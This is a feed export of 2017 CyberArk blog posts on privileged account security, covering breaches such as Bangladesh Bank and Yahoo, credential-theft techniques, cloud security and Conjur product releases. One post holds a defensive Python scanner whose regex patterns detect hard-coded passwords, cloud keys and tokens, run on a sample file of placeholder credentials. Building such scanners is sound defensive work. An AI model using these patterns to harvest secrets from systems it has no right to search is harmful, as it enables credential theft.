SWIFT Security Concerns Resurface https://www.cyberark.com/blog/swift-security-concerns-resurface/ Mon, 27 Mar 2017 19:03:05 +0000 https://www.cyberark.com/blog//

The Bangladesh Bank heist has resurfaced as reports around a potential perpetrator make headlines. The recent focus may be on who and why, but lessons should be learned from what happened – it’s important to recognize common attack patterns and understand the role of privileged accounts.

As a recap: last year, cyber criminals embezzled money from the Bangladesh Central Bank. Using stolen privileged credentials, they moved laterally throughout the environment until they reached SWIFT, a financial services co-op that provides a secure network through which banks can send and receive monetary transactions. Using these privileged credentials, the criminals ultimately ordered a total of 35 transactions worth $951 million through the SWIFTNet systems. From there, approximately $81 million was transferred before a spelling error raised suspicion that led to the discovery of the breach. (Watch a short video for a brief overview of the attack path.) This was a high-profile attack, but Bangladesh Bank was not the only bank targeted, as noted in a Reuters article.

Lessons learned from the breach and how you can protect your organization:

  • SWIFT Vulnerabilities: Many industry experts have pointed out vulnerabilities in SWIFT, noting that the system has likely not seen its last “bank robbery.” In this CSO article, Lavi Lazarovitz, CyberArk Labs cyber research team leader, explains that attackers are “getting really good at gaining that all important initial foothold inside networks by using attacks such as spear phishing.” With that foothold, they can gain local administrator privileges using, for example, an exploited Acrobat Reader vulnerability; when a user simply opens a malicious PDF file, the file runs malicious code that in turn acquires those elevated privileges.
  • Best Practices to Shore up Privileged Account Security: The Bangladesh Bank attack is yet another example of how attackers covet, seek out and exploit privileged accounts to achieve their mission. While this attack had a serious outcome and required advanced planning, the attack methods used were not very sophisticated. In a post-mortem analysis of the attack, CyberArk security researcher Asaf Hecht outlines five best practices that would have likely mitigated the breach.
  • How Banks Mitigate Risk: The threat is real and present. Many major banks recognize this and have taken steps to prioritize privilege in the wake of this breach. This American Banker article describes how a $26.9 billion-asset bank uses CyberArk to lock down privileged accounts and monitor and analyze privileged account activity.

Want to learn more? Attend a webcast on March 28, 2017 at 2 pm ET. CyberArk Labs will address the cyber security lessons learned related to the heist. Register here.

]]>
Forrester’s 5 Steps to Reinforce and Harden Application Security https://www.cyberark.com/blog/forresters-5-steps-to-reinforce-and-harden-application-security/ Fri, 24 Mar 2017 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/forresters-5-steps-to-reinforce-and-harden-application-security/  

Forrester recently published an updated research document entitled “Five Steps to Reinforce and Harden Application Security”. It lays out strategies and steps that Infrastructure and Operations teams can take to collaborate with Security personnel to weave an ever-stronger security fabric into their applications. We’re happy to make that report available to you today. Below, we discuss each of the five steps and how Conjur’s trust-forward platform can help organizations implement each of those steps.

Step 1: Remove Environment Inconsistencies and Create a Bill of Materials

The report cites evidence that over 50% of web servers have one or more misconfigurations – and that’s just one example of how individually configuring production servers can lead to security exposures. You should embrace the ethos of “configuration-as-code” to establish clear and proven best-configurations, and to minimize and catch any drift from those configurations.

Conjur integrates with many of the leading Configuration Management (CM) and Application Release Automation (ARA) solutions in the market including Puppet, Chef, Ansible, and SaltStack. In fact, our latest release introduces even stronger integration with Puppet than ever before including capabilities for establishing Node Identity, support for the Sensitive data type, and rich integration at the UI level to make it easier than ever to manage hosts maintained with Puppet.

Step 2: Monitor Changes by Controlling Access to Systems and Network Devices

This point is all about ensuring that you have strong identity-driven controls in place to protect yourself from outsider and insider threats, and using tight controls, such as Privileged Access Management (PAM) / Privileged Identity Management (PIM) tools, to ensure that only authenticated and authorized users are allowed to configure, deploy, and access production infrastructure.

Conjur doubles down on this point by providing industry-leading Secrets Management / PAM capabilities that are fully automated / integrable with your CM/ARA tools and your CI/CD pipeline. This approach significantly reduces your threat surface by eliminating humans from the chain of custody for production secrets.

Step 3: Assist in Intrusion Detection and Response

Intrusion is not an “if”, it’s a “when”. In spite of all your best efforts, it’s only a matter of time before you are compromised. It’s critical to pre-define “red flag” conditions and thresholds, including combinations of tripwires, and communicate those to your security team so that they can monitor for those conditions in real-time.

Conjur not only tracks each request for a secret or an authorization decision, but it also integrates with enterprise SIEM tools such as Splunk and ArcSight so that your security team and your Security Operations Center (SOC) have real-time visibility into what’s happening in your production environment. Conjur also provides a “kill-switch” capability that allows instantaneous shutdown of any access if it’s flagged. As with all things Conjur, this can be done manually or can be programmatically integrated into your incident response workflow for full automation and instant response.

Step 4: Log Everything Possible

Not much explanation needed here. A detailed audit trail is like a police officer’s backup / ankle weapon (you don’t need it till you need it badly). Detailed log information on every configuration change, authentication / authorization request and disposition, etc. is what your forensic team will use when digging into issues when (not if) they occur.

Conjur stores every transaction, even those that are requested but not approved, into an immutable database. The audit trail can be inspected at any time via APIs and command line tools. More importantly, Conjur provides rich, user-friendly reports that can be used by auditors and other non-technical users. These reports and views can be quickly filtered to narrow down to audit events during a particular timeframe, or for a particular role or resource.

Step 5: Create a Stack of Application Security Tools

Infrastructure and Security personnel need to have a diverse arsenal of tools for securing access to infrastructure and resources, performing dev-time and run-time security monitoring, and kicking off incident response workflows as and when needed. Conjur provides a crucial piece of that security mosaic, and is completely programmable to ensure that it can fit seamlessly into a modern Secure DevOps, or SecDevOps, workflow.

]]>
Hunting Privileged Account Vulnerabilities with CyberArk Discovery & Audit (DNA) https://www.cyberark.com/blog/hunting-privileged-account-vulnerabilities-cyberark-discovery-audit-dna/ Fri, 24 Mar 2017 13:37:36 +0000 https://www.cyberark.com/blog//

It’s widely understood that cyber intruders and internal threat actors seek and exploit privileged accounts to help them achieve their goals. Security experts advise organizations to know what’s on their networks and know it better than any potential adversary.

But discovering and locking down all of the privileged accounts within your enterprise is easier said than done—especially when you consider there are typically 3-4x more privileged accounts than people in the average organization. These accounts “live” in hard-to-reach places within your network including applications, endpoints, servers, databases and the cloud.

Here are some challenges organizations encounter when working to simply understand—let alone protect—privileged accounts in their environments:

On premises and some cloud environments:

  • There are often multiple accounts associated with one person and all of them have admin privileges.
  • Many passwords are set to never expire to mitigate the risk of an interruption or issue.
  • Many privileged accounts are mistakenly thought to be unused, but in reality, are used to log into systems regularly. Worse, it’s hard to pinpoint who is currently using them.
  • Service accounts with “recently created” passwords have actually been using the same passwords for years—sometimes even a decade.
  • It’s often difficult to locate hard-coded or embedded credentials stored within applications.

Specifically in cloud environments:

  • In AWS, Elastic Cloud Compute (EC2) instances can be accessed using both EC2 private keys and individual AWS accounts.
  • AWS root account credentials can be shared among multiple users, putting these highly sensitive credentials at an increased risk of loss or theft.
  • In the cloud environment, it can be challenging to manage roles-based and temporary access.

How can you determine where all of your privileged accounts are before your attackers do? Take the first step by scanning your network with our CyberArk Discovery & Audit™ (DNA) tool available at no charge. One scan will help you discover the privileged attack surface of your organization by identifying where privileged accounts exist on-premises and in the cloud, your current privileged account security risks, accounts with local administrator rights, and machines that are vulnerable to credential theft attacks (such as credential harvesting, Pass-the-Hash, Overpass-the-Hash and Golden Ticket). Last year, our CyberArk DNA tool scanned more than 21 million machines, helping organizations take the first step towards reducing privileged account risks.

Enterprises that fail to prioritize the security of their privileged accounts are at risk of becoming victims of a cyber attack—which can mean major damage to business, reputation and even the ability to operate. Take the first step toward securing your privileged account environment. Run the CyberArk DNA scan today.

]]>
Six Ways Attackers Try to Steal Privileged Credentials https://www.cyberark.com/blog/six-ways-attackers-try-steal-privileged-credentials/ Tue, 21 Mar 2017 15:59:19 +0000 https://www.cyberark.com/blog//

By now, most understand that privileged accounts play a leading role in the cyber attack lifecycle and also in advanced cyber attacks. Privileged accounts can access the most sensitive data in an organization, modify or completely disable security mechanisms, and stop, start, or modify the processes, systems, and apps that the business runs on.

Yet despite this knowledge, many organizations still share credentials directly with users, contractors, or third-party vendors. They also store passwords in spreadsheets, only rotate credentials (at best) every 30 days, and give users—and service accounts—full admin rights on desktops and servers.

In a recent CyberArk webinar, my colleague Kevin Naglich noted that attackers recognize and take advantage of these poor security practices and routinely employ six common techniques to steal privileged credentials:

  1. Keystroke logging: Capturing everything that a user types, including their privileged passwords.
  2. Password cracking: Attempting to guess or “crack” credentials with brute force. Industry reports have revealed network administrators, database administrators and system administrators (in other words, people who should know better) are often the worst offenders (and therefore key targets in an attack) when it comes to having easy-to-crack passwords.
  3. Memory scraping: Looking into the memory on desktops, searching for credentials that may be saved in plain text, or in Windows environments, searching for particular hashes that can be used in pass-the-hash attacks.
  4. Password spreadsheets: Locating spreadsheets containing passwords. (Yes, this is still a thing. If you have one, get rid of it today.)
  5. Social engineering: Tricking a user into giving up their credentials directly.
  6. Hard-coded application credentials: Passwords or SSH keys that are within application code, scripts, or configuration files that enable far-reaching access but are often unchanged for years at a time.
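From the defender's side, technique 6 is the one you can find before an attacker does, by scanning your own code, scripts and configuration. The Python below is an added example (not a CyberArk or Conjur tool) that flags hard-coded passwords, cloud keys, API tokens and private-key blocks in a constructed sample file, treats vault-injected placeholders such as ${DB_PASSWORD} as non-findings, and masks what it reports so the report itself does not leak secrets.

```python
"""Hard-coded credential scanner for code, scripts and configuration (constructed example).

Not a CyberArk or Conjur tool. Run it over your own repositories, images or
deploy scripts; findings are masked so the report does not itself leak secrets.
"""
import re
from typing import Dict, List, NamedTuple

# Detector name -> regex; group 1 is the candidate secret value.
DETECTORS: Dict[str, "re.Pattern[str]"] = {
    "password assignment": re.compile(
        r"(?i)\b(?:password|passwd|pwd|secret)\s*[:=]\s*['\"]?([^'\"\s#;]{4,})"),
    "AWS access key id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    "AWS secret access key": re.compile(
        r"(?i)aws_secret_access_key\s*[:=]\s*['\"]?([A-Za-z0-9/+]{40})"),
    "API key or token": re.compile(
        r"(?i)\b(?:api[_-]?key|token)\s*[:=]\s*['\"]?([A-Za-z0-9_\-]{16,})"),
    "private key block": re.compile(
        r"(-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)"),
}

# Values that are references to a vault or template engine, not literal secrets.
PLACEHOLDER = re.compile(r"^(?:\$\{[^}]*\}|\$\([^)]*\)|\{\{.*\}\}|<[^>]*>)$")


class Finding(NamedTuple):
    line_no: int
    kind: str
    masked: str


def is_placeholder(value: str) -> bool:
    """True for ${VAR}, $(cmd), {{ var }} or <value> style references."""
    return PLACEHOLDER.match(value.strip()) is not None


def mask(value: str) -> str:
    """Keep just enough of the value to locate it; never echo the whole secret."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def scan_text(text: str) -> List[Finding]:
    """Return one Finding per (line, detector) hit, skipping placeholder values."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in DETECTORS.items():
            match = pattern.search(line)
            if match and not is_placeholder(match.group(1)):
                findings.append(Finding(line_no, kind, mask(match.group(1))))
    return findings


# Constructed sample: a Rails-style database.yml followed by a deploy script.
# The AWS values are the well-known documentation placeholders, not live keys.
SAMPLE_FILE = """\
# config/database.yml (constructed sample)
production:
  adapter: postgresql
  username: app_user
  password: Summ3rTime2011!
  host: db.internal.example
staging:
  password: ${DB_PASSWORD}   # injected from the vault at run time: not a finding
# deploy.sh
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
api_key = "sk_live_EXAMPLE_0123456789abcdef"
-----BEGIN RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_FILE):
        print(f"line {f.line_no:>3}  {f.kind:<22} {f.masked}")
```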

These techniques enable attackers to bypass and short-circuit controls. Think of it this way: privileged account security is THE control that affects all other controls. Even if an organization spends significant time and resources building strong password complexity rules and policies, it may find that all it takes is one keystroke logger to cause everything to fall apart. Consider Verizon’s 2016 Data Breach Investigations Report, which notes, “Prominent malware families […] are designed to capture keystrokes from an infected device. All those efforts to get users to use special characters, upper/lower case numbers and minimum lengths are nullified by this ubiquitous malware functionality.”

Another illustration of the depths of this problem can be seen in Mandiant’s M-Trends Report, which notes that the company’s Red Team, on average “is able to obtain access to domain administrator credentials within three days of gaining initial access to an environment.” While layered security is certainly critical (including proactive controls such as encryption and detection systems to identify malicious behavior), these systems can be largely ineffective without privileged account security in place as a safeguard.

An investment in privilege is not simply addressing one niche area of security; it is raising the security posture of the entire organization. That’s why it’s important to prioritize privileged account security, and approach it with a program mindset. Successful deployments typically define a strategy that follows a risk-based roadmap, establish a maturity model that accumulates quick wins to build momentum, and lay the groundwork for automating as many tasks as possible.

Want to learn more? Watch a brief video about the three primary phases for successfully implementing the CyberArk Privileged Account Security Solution.

]]>
Secrets Management at Cloud Scale – A Benchmark https://www.cyberark.com/blog/secrets-management-at-cloud-scale-a-benchmark/ Fri, 17 Mar 2017 14:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/secrets-management-at-cloud-scale-a-benchmark/  

Secrets Management, a concept that overlaps somewhat with Privileged Access Management (PAM), has been a mainstay of enterprise security for a long time. However, the original use cases around which many of the incumbent tools in this space were built were human-centric — a canonical use case being say, a DBA needing privileged access to make some updates to a production database containing customer information. This human-centric approach, completely valid for the intended purpose, was designed to scale accordingly — hundreds or at the most thousands of administrative users of various stripes making interactive requests to manage servers, databases, and the like.

In the Cloud, Secrets Management has to scale at an entirely different level. With automated build, integration, and Configuration Management (CM) tools powering up VMs and micro-services, we are now required to contend with scale that is multiple orders of magnitude beyond those original use cases. In a previous blog post we shared that we had a customer that had to, from time to time, “reboot” their cloud for lack of a better phrase. This triggers tens of thousands of VMs being cycled simultaneously, resulting in the need to request over 4 million secrets per minute!

We don’t think this is unusual for organizations moving to the cloud. Even small and mid-sized institutions are delivering customer and consumer facing applications in the healthcare, financial services, media, entertainment, and other industries that will need this type of scale.

Unfortunately, doing a web search for any combination of “secrets management” and “scale” or “scalability” doesn’t yield great results. The topic is either confused or conflated with other considerations. While those other things are related and not unimportant, the crucial point around being able to deliver secrets management at cloud scale seems to get lost in the noise. Sometimes it’s discussed in the context of administrative scale (a not unimportant issue that we will discuss in a future blog post) — that is, the ability to manage key and secret distribution, user administration, and the like across a large and distributed set of humans. Other times it’s treated as a high-availability conversation (again, important but not the same thing). Sometimes it’s just left as an exercise in scaling the back-end you use for secrets management.


At the request of several of our prospects, we decided to run a benchmark of our performance at massive scale, and we wanted to share the results with you.

Environment:

To demonstrate the scalability of the Conjur platform, we created an AWS Auto Scaling Group (ASG) containing Conjur Followers (Learn more about Conjur’s Master / Follower architecture here). The ASG was created from the Conjur CloudFormation template and modified to use an AMI that contains a Conjur container configured as a follower. The ASG is configured to use m4.large instances, each of which has 2 vCPUs. It has a scaling policy that will scale out when the average CPU utilization exceeds 50%. When it hits that threshold, it will add a new instance of a Conjur Follower to the cluster.

Load Test Execution:

The load generator ran in 30 second bursts, issuing Conjur API requests for the values of 20 variables in a single batch. We started the test at 8 requests per second (fetching 20 variables in each request), and scaled it up to 128 per second. It generated load at each rate for 10 minutes.

Results:

[Figure: conjur-scaling.jpg: load test results over time, showing requests/sec, request latency, average cluster CPU utilization and cluster size]

The grey line is requests/sec, the ever-increasing load on the system, and you can see how it relates to request latency (the orange line). Remember that each “hit” on the system is actually a batch lookup of 20 secrets, so by the end of the test (when we’re running 128 req/sec) we’re actually looking up 2,560 secrets each second, and applying full levels of authentication, authorization, and auditing to each lookup. In other words, they’re expensive operations! That’s a sustained load of 153,600 secrets looked up each minute, or 9.2M each hour. And that’s not even the ceiling – not even close. Read on…

The important part is that as the Amazon ASG adds more Conjur Follower nodes to the cluster to handle the increasing load, the request latency always stays predictable, hovering around 100ms.

The blue line shows the CPU utilization of the whole cluster (as an average). The red line shows the size of the cluster group, and it steps up whenever AWS determines that the group is getting too loaded for the current traffic levels. You can see that whenever the red line steps up (when a node is added), the result is that both the latency and CPU utilization average drop thanks to the extra horsepower. Then, as the load increases, they track back up.

Takeaway:

Conjur can handle ever-increasing load, but its latency never falters. And this is while performing expensive authentication, authorization, and audit functions on each operation. You can scale it to your heart’s content, and it remains a predictably-behaving system. We only stopped the test because we’d proven our point, but theoretically we could keep going indefinitely.

There are many aspects to properly architecting and deploying an enterprise-grade cloud security architecture. Scale and throughput, without sacrificing audit and security requirements, should be one of the key considerations when you design yours.

 

]]>
The Yahoo Breach: Privileged Account Compromise Revealed https://www.cyberark.com/blog/yahoo-breach-privileged-account-compromise-revealed/ Thu, 16 Mar 2017 19:08:30 +0000 https://www.cyberark.com/blog//

According to an article in Ars Technica, in an interview last evening, the FBI implied that the attackers who infiltrated Yahoo – including two alleged Russian FSB agents – followed a common pattern seen in many high profile cyber attacks including SWIFT and the Bangladesh Bank, the Ukraine power outage, the DNC, U.S. Office of Personnel Management (OPM) and many more. This pattern often begins with a targeted phishing attack to steal an employee’s credentials, then compromises the employee’s workstation with malware, and finally uses privileged credentials harvested from the compromised workstation to expand the attack to other assets within the enterprise.

Privileged credentials are the ultimate espionage asset – they allow attackers to quietly extend beyond their initial foothold within an organization and access its most critical data by posing as a trusted insider. If this was a spy novel, the attackers could not have done any better even if they had recruited a top-level human asset inside the organization.

In the Yahoo case, by exploiting these credentials, the attackers were able to extend their reach to compromise the Yahoo user database and use information in it to forge authentication tokens. Essentially, they were able to become ANY Yahoo user – including anyone with a Yahoo email account.

This means that the attackers could read every email, reset passwords for any website the Yahoo user may have linked to their account (such as an online banking account), or they could pose as the Yahoo user to target others with phishing emails.

According to the U.S. Department of Justice (DOJ) indictment, the attackers used this power to access the accounts of journalists, U.S. government officials, executives at prominent financial services organizations, and employees at cyber security vendors, among others. A scary reality in today’s connected world – and a major reason why information is becoming harder to trust.

This massive espionage/criminal campaign started with getting an asset inside – as in similar cases, these “assets” are privileged accounts. Many CISOs and security professionals understand that privileged accounts are the first tools adversaries seek, once within their network, to extend their reach and complete their mission. We don’t need any more reminders that shutting down the privileged account pathway must be an organizational priority.

]]>
Conjur 4.9 – Full Puppet Integration https://www.cyberark.com/blog/conjur-4-9-full-puppet-integration/ Fri, 10 Mar 2017 19:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-4-9-full-puppet-integration/  

Today we are proud to announce the general availability of Conjur 4.9! Conjur helps organizations large and small manage the security risk of delivering apps to the cloud by securing the Continuous Delivery pipeline. To that end, Conjur provides first-class integrations with the tools most often used to construct these pipelines.

Puppet integration

Conjur 4.9 provides a complete integration with Puppet, a configuration management platform that enables organizations to operate their infrastructure with more agility and confidence. Conjur’s Puppet integration consists of two parts: an official Puppet module and Puppet annotation support in the Conjur UI.

Puppet module

Version 1.0 of the official Conjur Puppet module is now available on the Puppet Forge.

https://forge.puppet.com/conjur/conjur

This module simplifies the operation of establishing Conjur host identity and allows authorized Puppet nodes to fetch secrets from Conjur. Compared to solutions like hiera-eyaml, our Puppet module is simpler to use and provides more visibility and flexibility for Puppet secrets workflows.

Highlights for Conjur’s Puppet integration include:

  • Secrets are never exposed to the Puppet master.
  • Node identity is established with Host Factory tokens. This avoids the need to deploy decryption keys to Puppet nodes before converge.
  • The module works with or without a Puppet master.
  • Every attempt to access a secret is recorded to Conjur’s immutable audit log.
  • The Sensitive data type is supported for Puppet agents 4.6 and higher. This makes it easier to keep sensitive information out of Puppet logs.

See the Puppet Forge page for the module for complete instructions and examples.

Our Puppet module is open source and hosted on GitHub: https://github.com/conjur/puppet.

Conjur UI

The Conjur UI has been enhanced to make it easier to view and manage hosts maintained with Puppet. The Conjur Puppet module automatically applies a “puppet” annotation to any host created with a Host Factory token. Puppet hosts can now be distinguished at a glance in the Conjur UI by a prepended Puppet icon.

Additionally, any role or resource annotated with “puppet” can now be found by using the search bar in the Conjur UI. This makes it much easier to view and run security reports on the identities and secrets used by Puppet in any environment.

[Screenshot: conjur-ui-puppet-search.png: searching for Puppet-annotated roles and resources in the Conjur UI]

Please see the full 4.9.0 release notes for more details and the full list of changes in this release.

Contact us for release access and upgrade instructions, or if you have any questions. We hope you enjoy this new release of Conjur!

]]>
To Improve Health IT Security, Recognize the Importance of Privilege https://www.cyberark.com/blog/improve-health-security-recognize-importance-privilege/ Thu, 09 Mar 2017 15:00:16 +0000 https://www.cyberark.com/blog//

The increased use of electronic medical records and rapid advances in healthcare technology have made hospitals target-rich environments for hackers. Unfortunately, the maturity of hospitals’ cyber security programs is often years behind that of other technology-dependent sectors, such as financial services. It’s no surprise that cyber security was a prominent topic at this year’s HIMSS conference.

In our conversations with industry professionals, we hear a widespread concern about the security posture at their hospitals. Outdated and unsupported software, inadequate resources, a lack of executive support, cultural resistance, and rapidly evolving technology have left hospitals vulnerable to attacks such as the ransomware exploit that forced Hollywood Presbyterian Medical Center to pay a $17,000 ransom to regain access to its network last year.

The problem is not limited to ransomware or network access. Poor cyber security hygiene makes networked medical devices on the hospital floor vulnerable to breaches, potentially putting patients’ health and lives in the hands of intruders. Properly managing access to privileged accounts and critical devices can mitigate risk and significantly boost hospitals’ cyber security posture.

The healthcare environment

Hospitals and medical centers are complex environments where advanced technology is supported by networks that were not wholly designed for it. Networked monitors, infusers, ventilators, etc. provide improved patient healthcare and reduce staff burden, and their deployment can increase the number of network endpoints by the thousands. The nature of these devices – they are critical to the health of patients – creates a conflict often seen between operational technologies and advanced security controls.

In a budget-conscious industry that struggles to control costs, decision makers without an understanding of IT often do not prioritize the critical task of cyber security. The mix of administrative, medical and technical users on the network also makes it difficult to get a stakeholder consensus on changes needed to improve security. This problem can be compounded in teaching hospitals, which, like most universities, emphasize access and sharing.

The privilege pathway

The importance of controlling access to privileged accounts on connected devices was demonstrated last year when a massive distributed denial-of-service (DDoS) attack was launched against Dyn, a provider of Internet services to Internet sites. It was reported that the attack was conducted using millions of Internet of Things devices compromised by the Mirai malware, which relied on factory-default user names and passwords to infect them.

These user names and passwords were easily available, and intruders were able to access and install Mirai malware on thousands of online devices such as digital video recorders and IP cameras. Because device owners did not change the default settings, the devices became part of a massive botnet used to launch DDoS attacks.

The impact of this risk goes beyond consumer devices and DDoS attacks. Privilege—the ability to use accounts that give users wide-ranging powers on a network and devices—is one of the first things an intruder looks for in an attack. Default administrative passwords are an easy way for intruders to get onto the privilege pathway, enabling them to complete their mission. This can put medical equipment on the hospital floor at risk of compromise, and with these devices the stakes are much greater and the threat more urgent.

Blocking the privilege pathway raises the bar for attackers by increasing the amount of effort and level of skills needed for a successful attack.

Mitigating the risk with good cyber security hygiene

Practicing good security hygiene in the form of proper password management is an effective way to reduce the risk from a breach. Managing access privileges does not mean denying them. Ensuring that default passwords are not being used, that administrative passwords are not being shared, and that all passwords are properly managed secures privileged accounts without disrupting access by those who need it.

This can be done without changing processes or disrupting established procedures. CyberArk has developed a powerful, modular technology platform that provides a comprehensive Privileged Account Security Solution to address this threat, enabling healthcare organizations to take a painless first step in maturing IT security.

 

Cloud Security: Who is Responsible for What? https://www.cyberark.com/blog/cloud-security-responsible/ Tue, 07 Mar 2017 16:04:23 +0000 https://www.cyberark.com/blog//

Today, the benefits of cloud computing are very well established: it is less costly and provides increased flexibility and agility, including the ability to support on-demand computing at scale. The debate surrounding the security of cloud computing, specifically whether data was more secure in the cloud or not, has for the most part been settled. A growing number of organizations now view the cloud as secure, and in many cases, more so than an on-premises deployment.

Infrastructure-as-a-Service (IaaS) and Platform-as-a-Service (PaaS) – where a company’s own applications and assets run on infrastructure operated by the public cloud vendors — have also grown in popularity. Amazon Web Services (AWS) and Microsoft Azure have experienced significant growth, in part because of the relative ease for an organization to set up and deploy their applications at scale in cloud environments.

Public cloud vendors focus on the security of the cloud infrastructure, including the compute, storage and networking resources as well as the physical infrastructure, but they recognize that they are only able to provide a partial solution. In fact, as each of the public cloud vendors points out, security in the cloud is a shared responsibility – with the organization, as the application owner, being responsible for protecting applications, the OS, supporting infrastructure, and other assets running IN the cloud.

Essentially, everything above the hypervisor or equivalent layer is the responsibility of the application owner. Organizations may also need to configure some of the services provided by the cloud vendor. For example, basic perimeter security is included with the cloud vendor’s infrastructure, but it is configured by the customer.

In case there is any doubt, the AWS Customer Agreement, for example, is very clear on the limits of AWS’ responsibilities for securing the enterprise’s applications and data. The liability is limited to refunding what the enterprise paid AWS for services in the past year. As a speaker at the recent HIMSS healthcare IT conference pointed out, even if the cloud vendor could be proven to be at fault for a breach, and that’s a big if, it’s very unlikely the enterprise would be covered for direct financial loss caused by the loss of patients’ medical records. On top of that, there are other costs including regulatory fines, reputational loss and, most importantly, impact on the organization’s customers.

While the public cloud vendors take steps to ensure the security OF the Cloud, ultimately, just like with an on-premises data center, it is the enterprise and application owner that is responsible for security IN the Cloud, and for ensuring that your customers’ data is secure.

Unfortunately, that message may not be getting through to all cloud users. A recent survey carried out as part of a webinar I gave to security professionals revealed that 19 percent of respondents rely on the cloud vendor’s security while 28 percent use a mixture of third-party security and the cloud vendor’s technology. A further 16 percent said their security arrangements varied based on the specific application or business unit.

Organizations that rely solely on a cloud vendor’s built-in security are potentially exposing their organization to unnecessary risk.

While there are multiple steps required to protect cloud infrastructure, particularly when it comes to IaaS/PaaS, for most organizations it makes sense to start with the cloud vendor’s management console. With a public cloud vendor such as AWS or Azure, the enterprise’s entire cloud infrastructure is accessed through the cloud vendor’s management console. This management console is incredibly powerful and really does hold the “keys to the Cloud kingdom,” even more so than the on-premises admin consoles.

The management console typically enables:

  • Set up and configuration of the entire cloud infrastructure – allocating resources, setting up applications, compute instances, determining the regions and zones the apps run in
  • Setting security parameters, delegating authority and enabling others to have access
  • Billing, and purchasing of applications from the marketplace

Unfortunately, the management console is also an attractive target and a likely entry point for an attacker, given the human administrator’s vulnerability to phishing. So a first step in securing cloud assets is to make sure that the enterprise locks down, controls and monitors the management console and secures the associated credentials.

Fortunately, for most organizations this first step of ensuring that the credentials for accessing the management console are secure should be relatively straightforward. In fact, CyberArk’s customers use our digital vault infrastructure to secure, rotate and control access to the privileged passwords used to authenticate to the management console.

Another critical step is to protect the credentials that applications and other assets running in the cloud need to access resources, such as customer databases and other assets. Unfortunately, the required credentials are all too often hardcoded in applications, and this is a troubling and unnecessary vulnerability which needs to be addressed. Today developers and cloud administrators use CyberArk Application Identity Manager (AIM) to eliminate embedded credentials in cloud applications by storing the credentials in the CyberArk digital vault, rotating and controlling application credentials according to policy, etc.

Taking these steps helps organizations address their responsibilities to ensure the security of their cloud applications and to meet their compliance needs. An added benefit is that the same digital vault infrastructure can be used to secure credentials not only for the public cloud management consoles and cloud applications, but also for all the other privileged credentials and passwords used to secure on-premises and hybrid environments, as well as DevOps tools. This is extremely important to CISOs and IT leaders wanting to follow the best practice of enforcing the same security policies across the enterprise regardless of the compute environment.

 

Q&A with CyberArk’s Adam McCord on the Cyber Security Landscape in Latin America https://www.cyberark.com/blog/qa-cyberarks-adam-mccord-cyber-security-landscape-latin-america/ Tue, 28 Feb 2017 16:28:06 +0000 https://www.cyberark.com/blog//

Adam McCord was named CyberArk’s vice president of sales for Latin America in January, bringing with him 17 years of cyber security experience in a variety of sales and leadership roles in this dynamic and expanding market.

CyberArk enables organizations to defend against both insider threats and external attackers who have made it past the network perimeter by securing access to privileged accounts, thereby limiting an attacker’s ability to move throughout the enterprise network. In his new position, McCord is responsible for expanding the regional sales team and partner network in Latin America to increase awareness and improve access to CyberArk solutions.

We spoke recently with McCord about the cyber security challenges faced by Latin American organizations and the role of privileged account security in proactive security programs.

CyberArk: Congratulations on your new role, Adam. You’ve worked for many years in Latin America, how would you characterize the market?

McCord: There are 50 countries in this territory, and all of them have different regulatory, budgetary and risk profiles. But the common denominator is that attacks are becoming more frequent and the impact of those attacks has become more significant over the last few years. In the past, attacks were more operationally targeted, and today they are more economically targeted. To paint a picture, industry experts project that global organizations will lose a staggering $2 trillion annually from malicious cyber activities by 2019. In Latin America today, approximately $90 billion is lost each year due to cyber crime, and that number is expected to surge as many local organizations remain ill-prepared to deal with developing security risks. It’s estimated that the total average cost of each of these data breaches is $4 million globally.

The regulatory environment is also significantly stricter today than it has been in the past, driving awareness within organizations, not just of properly managing and protecting privileged accounts, but also of the overall threat environment. Businesses are making investments commensurate with that risk. Another common denominator is the insider threat, which is difficult to manage. From what we have seen in the region, roughly 70 percent of exfiltrated data comes from intentional breaches from within.

CyberArk: What is the status of the CISO in Latin America today?

McCord: Until a few years ago many organizations did not have the office of the CISO; it was a managerial role within the organization. It wasn’t on par with or reporting into the CIO. Today more organizations have a CISO – a person in charge of building a security program who holds a portion of the IT budget. They might call the role something else, but at the end of the day that’s what it is. Organizations understand that in this day and age, to mitigate the risk of appearing negatively on the front page, they’d better have a strong CISO office and a dedicated security program.

CyberArk: What conversations are you having with CISOs?

McCord: Today most assume that the perimeter has been breached and there are bad actors on the network, and the only way to avoid a grievous breach is by removing critical access from those users.

They understand that attackers need to escalate privileges and leverage credentials in order to move laterally and steal data, and as a result, they agree that it is necessary to secure privileged accounts. If you can’t escalate privileges you can’t move. If you can’t move, you can’t find the data. And if you can’t find the data, you can’t steal it. They also know that after a breach, changing all the passwords on critical systems is the first action to begin to rebuild a trusted environment. When they put these two things together, CISOs can take a proactive, preventative approach to help avoid serious breaches.

CyberArk: You mentioned that insider threats are a growing concern. How is this challenge being met?

McCord: There is very little that traditional security can do to stop bad actors inside the network. Everybody has a potential Snowden—the high level admin who is basically God on the network—and they can escalate, they can move, they can make changes, erase logs; they can do pretty much anything they want. Organizations don’t have any way to track and prevent this.

You can have the best technology on the perimeter, but at the end of the day, a malicious user on the network can get around any perimeter-based technology. So it is the protection on the privileged accounts that mitigates those kinds of breaches. This is the last line of defense before your data takes a walk out the door.

CyberArk: What about privilege-related risks in the cloud? Are these being addressed?

McCord: The need to control privileged accounts on the network is understood, and the next logical step is the cloud. Everybody is doing something in the cloud, or will be in the near future. And they’re not moving trivial applications—they’re moving major applications. The cloud creates new challenges in securing and managing privileged accounts – the attack surface is larger and extremely dynamic. CISOs realize the need to leverage the same technology to protect those resources, no matter where they’re located. It’s a natural progression.

————————————————————————

You can learn more about CyberArk’s solutions for privileged account security here.

